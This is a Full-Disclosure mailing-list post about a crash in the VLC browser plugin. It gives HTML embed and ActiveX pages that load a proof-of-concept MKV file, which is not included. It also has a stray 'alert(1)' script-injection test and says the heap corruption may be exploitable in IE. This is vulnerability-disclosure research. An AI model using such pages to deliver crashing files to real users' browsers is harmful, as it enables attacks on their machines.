Hi,

Please please please try to understand the attack vectors, guys (please think through all the cases before giving up).

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<html>
<head><title>Demo of VLC mozilla plugin</title></head>
<body>
<h1>Demo of VLC mozilla plugin - Example 1</h1>
<!-- NPAPI embed: Firefox/Chrome load the VLC plugin this way -->
<embed type="application/x-vlc-plugin" name="video1"
       autoplay="no" loop="yes" width="400" height="300"
       target="poc.mkv" />
<br />
<a href="javascript:;" onclick='document.video1.play()'>Play video1</a>
<a href="javascript:;" onclick='document.video1.pause()'>Pause video1</a>
<a href="javascript:;" onclick='document.video1.stop()'>Stop video1</a>
<a href="javascript:;" onclick='document.video1.fullscreen()'>Fullscreen</a>
</body>
</html>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<script>alert(1)</script>
<!-- ActiveX object: this is how IE loads the VLC plugin (in-process) -->
<object classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
        codebase="http://download.videolan.org/pub/videolan/vlc/last/win32/axvlc.cab"
        id="vlc" name="vlc" class="vlcPlayer" events="True">
  <param name="Src" value="poc.mkv" />
  <param name="ShowDisplay" value="True" />
  <param name="AutoLoop" value="True" />
  <param name="AutoPlay" value="True" />
</object>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now the real problem is that plugins are executed outside of the browser process, except in IE.
You can use my gist mediafuzz for fuzzing file formats in the browser (with little modifications): https://gist.github.com/cons0ul/2357771

Best,
Sachin Shinde
@cons0ul

On Wed, Jul 10, 2013 at 5:22 PM, Sachin Shinde <sachinshinde1102@xxxxxxxxx> wrote:
> Finally someone dumping debug logs on FD :)
>
> Here's my debug logs
>
> http://paste.ofcode.org/gcRAJB9ixqLKtxDBiyfvWv
> http://paste.ofcode.org/BtL95whhBFDPXiKPeF8ViJ
>
> poc crashes vlc at different addresses (I have seen 3 different addresses
> so far)
> Looks like heap corruption, can be exploited if vlc plugin crashes in
> browser :)
>
> Cheers,
> Sachin Shinde
> @cons0ul
Attachments:
  vlc_chrome.JPG (JPEG image)
  vlc_firefox.JPG (JPEG image)
  vlc_ie.JPG (JPEG image)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/